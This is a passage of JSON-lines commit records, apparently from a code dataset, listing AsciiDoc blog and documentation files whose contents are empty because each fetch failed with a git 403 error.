2016-07-29-kanban.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-07-29-kanban.adoc","new_file":"_posts\/2016-07-29-kanban.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9b089487c208c9e9708a29e1eb8bf275247eaa4c","subject":"Update 2016-08-15-Wechat.adoc","message":"Update 2016-08-15-Wechat.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-08-15-Wechat.adoc","new_file":"_posts\/2016-08-15-Wechat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"78345d6b4753d03856efff2603f35d39354804fa","subject":"Update 2017-10-17-Episode-115-Fifteen-Trabillion-Megadoodles.adoc","message":"Update 2017-10-17-Episode-115-Fifteen-Trabillion-Megadoodles.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2017-10-17-Episode-115-Fifteen-Trabillion-Megadoodles.adoc","new_file":"_posts\/2017-10-17-Episode-115-Fifteen-Trabillion-Megadoodles.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"664ffa95d212315de15fd9c673ecef1793bf6503","subject":"Update 2017-07-14-Pepper.adoc","message":"Update 2017-07-14-Pepper.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-14-Pepper.adoc","new_file":"_posts\/2017-07-14-Pepper.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"844730bc454ede607312df53a2a6b3cdb5d80978","subject":"Update 2017-08-26-Kotlin.adoc","message":"Update 
2017-08-26-Kotlin.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-26-Kotlin.adoc","new_file":"_posts\/2017-08-26-Kotlin.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9b39e80e728193f49b7860030325553600f8a8df","subject":"Corr link","message":"Corr link\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"Class path\/Exercices.adoc","new_file":"Class path\/Exercices.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"160f93a8d3dc9a88d1606687e02ec8cbf41b1c34","subject":"y2b create post 3 Cool Tech Deals - #1","message":"y2b create post 3 Cool Tech Deals - #1","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-05-29-3-Cool-Tech-Deals--1.adoc","new_file":"_posts\/2015-05-29-3-Cool-Tech-Deals--1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b4e81107d227958f1419a78e4fef3af023430047","subject":"fix: \u30ea\u30f3\u30af\u306e\u6539\u884c\u304c\u6d88\u3048\u3066\u3044\u305f\u306e\u3067\u4fee\u6b63","message":"fix: \u30ea\u30f3\u30af\u306e\u6539\u884c\u304c\u6d88\u3048\u3066\u3044\u305f\u306e\u3067\u4fee\u6b63\n","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-21-flutter-introduction.adoc","new_file":"_posts\/2018-05-21-flutter-introduction.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"01a5e113059311b8f8417694bed96642c245df67","subject":"Update 2015-07-07-Hello-World.adoc","message":"Update 2015-07-07-Hello-World.adoc","repos":"freekrai\/hubpress,freekrai\/hubpress,freekrai\/hubpress","old_file":"_posts\/2015-07-07-Hello-World.adoc","new_file":"_posts\/2015-07-07-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/freekrai\/hubpress.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c39720e7c94e5b6fd2caa8baaef3a7be82281ae0","subject":"Update 2016-09-18-Math-Week-2.adoc","message":"Update 2016-09-18-Math-Week-2.adoc","repos":"setupminimal\/blog,setupminimal\/blog,setupminimal\/blog,setupminimal\/blog","old_file":"_posts\/2016-09-18-Math-Week-2.adoc","new_file":"_posts\/2016-09-18-Math-Week-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/setupminimal\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"e5968f8a0b7a6e2bdec1bf7a835ddae4a43e823e","subject":"Update 2017-04-03-Engineering.adoc","message":"Update 2017-04-03-Engineering.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-03-Engineering.adoc","new_file":"_posts\/2017-04-03-Engineering.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"42e9d6d450a8aea50f4cad4235959cf88d090128","subject":"Update 2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","message":"Update 2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","repos":"patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io","old_file":"_posts\/2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","new_file":"_posts\/2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/patricekrakow\/patricekrakow.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"49ee7ae8ffec42e96f1da7cd232f82c96b6ca209","subject":"Add list of 3rd party libraries","message":"Add list of 3rd party libraries\n","repos":"MSG134\/IVCT_Framework,MSG134\/IVCT_Framework,MSG134\/IVCT_Framework","old_file":"docs\/src\/7-3rdparty-libraries.adoc","new_file":"docs\/src\/7-3rdparty-libraries.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/MSG134\/IVCT_Framework.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"088af152da3164140b431c924ad5d35553b18407","subject":"Update 2017-04-03-Engineering.adoc","message":"Update 2017-04-03-Engineering.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-03-Engineering.adoc","new_file":"_posts\/2017-04-03-Engineering.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"47858a36c79462cc2ef8e181edb6ab00520b1592","subject":"Update 2017-06-05-Good-iOS-architecture-with-TDD-unidirectional-data-flow.adoc","message":"Update 2017-06-05-Good-iOS-architecture-with-TDD-unidirectional-data-flow.adoc","repos":"dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io","old_file":"_posts\/2017-06-05-Good-iOS-architecture-with-TDD-unidirectional-data-flow.adoc","new_file":"_posts\/2017-06-05-Good-iOS-architecture-with-TDD-unidirectional-data-flow.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dakeshi\/dakeshi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"dffa2f6842c778d269bbdfe96c28fa0d8b72ce50","subject":"Added empty adoc file","message":"Added empty adoc file\n","repos":"smoope\/java-sdk","old_file":"src\/main\/resources\/docs\/sdk-reference.adoc","new_file":"src\/main\/resources\/docs\/sdk-reference.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/smoope\/java-sdk.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e811163d316537d14d54b8ed27a613c8f737dcef","subject":"Update 2017-05-24-Use-After-Free-fun-in-glibc.adoc","message":"Update 2017-05-24-Use-After-Free-fun-in-glibc.adoc","repos":"icthieves\/icthieves.github.io,icthieves\/icthieves.github.io,icthieves\/icthieves.github.io,icthieves\/icthieves.github.io","old_file":"_posts\/2017-05-24-Use-After-Free-fun-in-glibc.adoc","new_file":"_posts\/2017-05-24-Use-After-Free-fun-in-glibc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/icthieves\/icthieves.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"57b16b4ab355493c61578c0e11237416d566dfbf","subject":"Partial draft for Java Update-by-Query","message":"Partial draft for Java Update-by-Query\n","repos":"palecur\/elasticsearch,palecur\/elasticsearch,palecur\/elasticsearch,palecur\/elasticsearch,palecur\/elasticsearch","old_file":"docs\/java-api\/docs\/update-by-query.asciidoc","new_file":"docs\/java-api\/docs\/update-by-query.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/palecur\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3bfaf0945e1d787563581dc9790b5ae2e4efc531","subject":"Update 2015-10-22-Im-joining-the-Grails-team-at-OCI.adoc","message":"Update 2015-10-22-Im-joining-the-Grails-team-at-OCI.adoc","repos":"alvarosanchez\/alvarosanchez.github.io,alvarosanchez\/alvarosanchez.github.io,alvarosanchez\/alvarosanchez.github.io,alvarosanchez\/alvarosanchez.github.io","old_file":"_posts\/2015-10-22-Im-joining-the-Grails-team-at-OCI.adoc","new_file":"_posts\/2015-10-22-Im-joining-the-Grails-team-at-OCI.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/alvarosanchez\/alvarosanchez.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6a3d8432c2a46e32093c641418f71ccc7b0d60c2","subject":"Add IN\/Clojure 2020 event info (Feb 14-15, Pune, IN)","message":"Add IN\/Clojure 2020 event info (Feb 14-15, Pune, IN)\n","repos":"clojure\/clojure-site","old_file":"content\/events\/2020\/inclojure.adoc","new_file":"content\/events\/2020\/inclojure.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"ae71e38093d8ab22b1a677465e05bedafbcaab32","subject":"Current stable version is 2.0.0","message":"Current stable version is 2.0.0\n\n[ci 
skip]\n","repos":"bharavi\/jPOS,jpos\/jPOS,yinheli\/jPOS,imam-san\/jPOS-1,atancasis\/jPOS,c0deh4xor\/jPOS,sebastianpacheco\/jPOS,poynt\/jPOS,imam-san\/jPOS-1,jpos\/jPOS,barspi\/jPOS,jpos\/jPOS,bharavi\/jPOS,poynt\/jPOS,alcarraz\/jPOS,yinheli\/jPOS,yinheli\/jPOS,alcarraz\/jPOS,barspi\/jPOS,atancasis\/jPOS,alcarraz\/jPOS,sebastianpacheco\/jPOS,juanibdn\/jPOS,atancasis\/jPOS,poynt\/jPOS,barspi\/jPOS,bharavi\/jPOS,c0deh4xor\/jPOS,juanibdn\/jPOS,sebastianpacheco\/jPOS,c0deh4xor\/jPOS,imam-san\/jPOS-1,juanibdn\/jPOS","old_file":"doc\/src\/asciidoc\/master.adoc","new_file":"doc\/src\/asciidoc\/master.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jpos\/jPOS.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"067b6efbdb96440191a6071872b0adaddcf633c6","subject":"Update 2017-11-19-.adoc","message":"Update 2017-11-19-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-11-19-.adoc","new_file":"_posts\/2017-11-19-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ecadc8512dd031406c71dde4705d76dc244ded35","subject":"Link tuto","message":"Link tuto\n","repos":"oliviercailloux\/java-course,oliviercailloux\/jee,oliviercailloux\/java-course","old_file":"Dev tools\/Eclipse.adoc","new_file":"Dev tools\/Eclipse.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4c645038da1b98c419cb4fe72e54d47e474ec6ad","subject":"Update 2016-03-19-Bitcoin-comment-ca-marche.adoc","message":"Update 2016-03-19-Bitcoin-comment-ca-marche.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-19-Bitcoin-comment-ca-marche.adoc","new_file":"_posts\/2016-03-19-Bitcoin-comment-ca-marche.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6b3df05099c89365a7a6b4a90080f2ddf8986cdd","subject":"Update 2016-05-23-T-E-S-T-N-G.adoc","message":"Update 2016-05-23-T-E-S-T-N-G.adoc","repos":"mufarooqq\/blog,mufarooqq\/blog,mufarooqq\/blog,mufarooqq\/blog","old_file":"_posts\/2016-05-23-T-E-S-T-N-G.adoc","new_file":"_posts\/2016-05-23-T-E-S-T-N-G.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mufarooqq\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eaaf69f0e50e8f9667c5f8b2d4a958a3e5b961cb","subject":"Update 2016-07-13-Git-command.adoc","message":"Update 2016-07-13-Git-command.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-07-13-Git-command.adoc","new_file":"_posts\/2016-07-13-Git-command.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e1de772c29032054ce5e29596b6921ccc32ce67f","subject":"Update 2017-05-22-Hello-World.adoc","message":"Update 2017-05-22-Hello-World.adoc","repos":"andreassiegelrfid\/hubpress.io,andreassiegelrfid\/hubpress.io,andreassiegelrfid\/hubpress.io,andreassiegelrfid\/hubpress.io","old_file":"_posts\/2017-05-22-Hello-World.adoc","new_file":"_posts\/2017-05-22-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/andreassiegelrfid\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aff31a4f554bc843904c7c262f376522c5eb7870","subject":"Create Asciidoctor.adoc","message":"Create Asciidoctor.adoc","repos":"smru\/Documentation,smru\/Documentation","old_file":"Linux\/Asciidoctor.adoc","new_file":"Linux\/Asciidoctor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/smru\/Documentation.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"423715d44c34e0eaf4d2273a9387892d45ae1671","subject":"Adds links to Logstash plugins under the Integrations page.","message":"Adds links to Logstash plugins under the Integrations page.\n","repos":"fubuki\/elasticsearch,fubuki\/elasticsearch,fubuki\/elasticsearch,fubuki\/elasticsearch,fubuki\/elasticsearch,fubuki\/elasticsearch","old_file":"docs\/plugins\/integrations.asciidoc","new_file":"docs\/plugins\/integrations.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fubuki\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0764d43557c4adbe79a5bbcce73adc59a79728d1","subject":"Adding 0.8.0.CR1 release announcement","message":"Adding 0.8.0.CR1 release announcement\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"blog\/2018-07-04-debezium-0-8-0-cr1-released.adoc","new_file":"blog\/2018-07-04-debezium-0-8-0-cr1-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"47e79e134389ec5ab21c1b81c39c967aac4ca0cc","subject":"Implementation note for combined referential fix","message":"Implementation note for combined referential 
fix\n","repos":"keithbrown\/bridgepoint,lwriemen\/bridgepoint,leviathan747\/bridgepoint,leviathan747\/bridgepoint,travislondon\/bridgepoint,rmulvey\/bridgepoint,rmulvey\/bridgepoint,keithbrown\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint,keithbrown\/bridgepoint,lwriemen\/bridgepoint,xtuml\/bridgepoint,keithbrown\/bridgepoint,xtuml\/bridgepoint,leviathan747\/bridgepoint,keithbrown\/bridgepoint,rmulvey\/bridgepoint,lwriemen\/bridgepoint,rmulvey\/bridgepoint,cortlandstarrett\/bridgepoint,travislondon\/bridgepoint,xtuml\/bridgepoint,cortlandstarrett\/bridgepoint,leviathan747\/bridgepoint,xtuml\/bridgepoint,travislondon\/bridgepoint,lwriemen\/bridgepoint,lwriemen\/bridgepoint,travislondon\/bridgepoint,keithbrown\/bridgepoint,travislondon\/bridgepoint,rmulvey\/bridgepoint,rmulvey\/bridgepoint,travislondon\/bridgepoint,keithbrown\/bridgepoint,xtuml\/bridgepoint,xtuml\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint,leviathan747\/bridgepoint,travislondon\/bridgepoint,cortlandstarrett\/bridgepoint,cortlandstarrett\/bridgepoint,leviathan747\/bridgepoint,leviathan747\/bridgepoint,cortlandstarrett\/bridgepoint,xtuml\/bridgepoint,lwriemen\/bridgepoint,cortlandstarrett\/bridgepoint,xtuml\/bridgepoint,rmulvey\/bridgepoint,travislondon\/bridgepoint,leviathan747\/bridgepoint","old_file":"doc-bridgepoint\/notes\/11556_combined_attribute\/11556_combined_attribute_int.adoc","new_file":"doc-bridgepoint\/notes\/11556_combined_attribute\/11556_combined_attribute_int.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xtuml\/bridgepoint.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2224ecfb1a9eb3085f68ab48865d14fc03d9a34e","subject":"Create README.adoc","message":"Create README.adoc","repos":"alejandroSuch\/angular-cli","old_file":"1.0.0-beta.24\/ubuntu\/README.adoc","new_file":"1.0.0-beta.24\/ubuntu\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/alejandroSuch\/angular-cli.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"98376b9947a772aefbc788fdcade5924c05f84cd","subject":"Update 2017-07-10.adoc","message":"Update 2017-07-10.adoc","repos":"Nepal-Blockchain\/danphe-blogs,Nepal-Blockchain\/danphe-blogs,Nepal-Blockchain\/danphe-blogs,Nepal-Blockchain\/danphe-blogs","old_file":"_posts\/2017-07-10.adoc","new_file":"_posts\/2017-07-10.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Nepal-Blockchain\/danphe-blogs.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b3709c783dd9e23190338289ecdb560b8eff7d0f","subject":"Update 2016-08-01-Bookreview-A-short-History-of-Time.adoc","message":"Update 2016-08-01-Bookreview-A-short-History-of-Time.adoc","repos":"AppHat\/AppHat.github.io,AppHat\/AppHat.github.io,AppHat\/AppHat.github.io,AppHat\/AppHat.github.io","old_file":"_posts\/2016-08-01-Bookreview-A-short-History-of-Time.adoc","new_file":"_posts\/2016-08-01-Bookreview-A-short-History-of-Time.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/AppHat\/AppHat.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"89aedb448081e1c3b70f8c1f94771576216a9d1f","subject":"Update 2015-09-25-Back-to-Basic.adoc","message":"Update 
2015-09-25-Back-to-Basic.adoc","repos":"gilangdanu\/blog,gilangdanu\/blog,gilangdanu\/blog","old_file":"_posts\/2015-09-25-Back-to-Basic.adoc","new_file":"_posts\/2015-09-25-Back-to-Basic.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gilangdanu\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"28ef3a98daff0f8fed9f5a1f3471573e8968f293","subject":"Update 2015-10-25-Back-to-Basic.adoc","message":"Update 2015-10-25-Back-to-Basic.adoc","repos":"gilangdanu\/blog,gilangdanu\/blog,gilangdanu\/blog","old_file":"_posts\/2015-10-25-Back-to-Basic.adoc","new_file":"_posts\/2015-10-25-Back-to-Basic.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gilangdanu\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"65fb392a50f208fcdd45d73866f6e26f6b85c0c3","subject":"Update 2016-07-03-Rock-climbing.adoc","message":"Update 2016-07-03-Rock-climbing.adoc","repos":"evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io","old_file":"_posts\/2016-07-03-Rock-climbing.adoc","new_file":"_posts\/2016-07-03-Rock-climbing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/evolgenomology\/evolgenomology.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f8a1e971bd04f51c43a9208ba0d0b9baa30669eb","subject":"Update 2016-11-14-231000-Monday.adoc","message":"Update 2016-11-14-231000-Monday.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-14-231000-Monday.adoc","new_file":"_posts\/2016-11-14-231000-Monday.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5d00d9805277f5e0287cea0cd5a2090d46b62d63","subject":"Update 2016-12-23-A-Little-Poem.adoc","message":"Update 2016-12-23-A-Little-Poem.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2016-12-23-A-Little-Poem.adoc","new_file":"_posts\/2016-12-23-A-Little-Poem.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f66b3eb9940e0d4a53ba025f3503ec7d9e3a1cbd","subject":"Update 2017-01-25 Test asciidoc.adoc","message":"Update 2017-01-25 Test asciidoc.adoc","repos":"adrianwmasters\/adrianwmasters.github.io","old_file":"_posts\/2017-01-25 Test asciidoc.adoc","new_file":"_posts\/2017-01-25 Test asciidoc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/adrianwmasters\/adrianwmasters.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e02932d321a43c94f5b06f439a9e65cef41b958f","subject":"Added RELEASE.adoc","message":"Added 
RELEASE.adoc\n","repos":"obsidian-toaster\/generator-backend,obsidian-toaster\/generator-backend","old_file":"RELEASE.adoc","new_file":"RELEASE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/obsidian-toaster\/generator-backend.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6b4da4e25e473be1386a6a0016f743f3d746a5ed","subject":"More minor edits to style guide","message":"More minor edits to style guide","repos":"pstirparo\/artifacts,Onager\/artifacts,ForensicArtifacts\/artifacts,joachimmetz\/artifacts,ForensicArtifacts\/artifacts,joachimmetz\/artifacts,pstirparo\/artifacts,Onager\/artifacts","old_file":"docs\/Artifacts definition format and style guide.asciidoc","new_file":"docs\/Artifacts definition format and style guide.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/joachimmetz\/artifacts.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a666582ce74bb113508fc13f9452691045e7f6db","subject":"Update 2017-06-19-I-may-tell-me-whether-it-is-a-Deja-vu-or-easy-oblivion-Chrome-extension.adoc","message":"Update 2017-06-19-I-may-tell-me-whether-it-is-a-Deja-vu-or-easy-oblivion-Chrome-extension.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-19-I-may-tell-me-whether-it-is-a-Deja-vu-or-easy-oblivion-Chrome-extension.adoc","new_file":"_posts\/2017-06-19-I-may-tell-me-whether-it-is-a-Deja-vu-or-easy-oblivion-Chrome-extension.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e6491ce8547a5a90c6e0fe3e97e8f6f909087798","subject":"4.9 rn dummy","message":"4.9 rn dummy\n","repos":"vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs","old_file":"virt\/virt-4-9-release-notes.adoc","new_file":"virt\/virt-4-9-release-notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vikram-redhat\/openshift-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1234e1292c757ba473a5457a45ddb644f07bdd60","subject":"Update 2015-02-10-My-Documents-Title.adoc","message":"Update 2015-02-10-My-Documents-Title.adoc","repos":"jelitox\/jelitox.github.io,jelitox\/jelitox.github.io,jelitox\/jelitox.github.io","old_file":"_posts\/2015-02-10-My-Documents-Title.adoc","new_file":"_posts\/2015-02-10-My-Documents-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jelitox\/jelitox.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"91d7c14074171ade4a7ca60166779a6d8cbe1a2b","subject":"Update 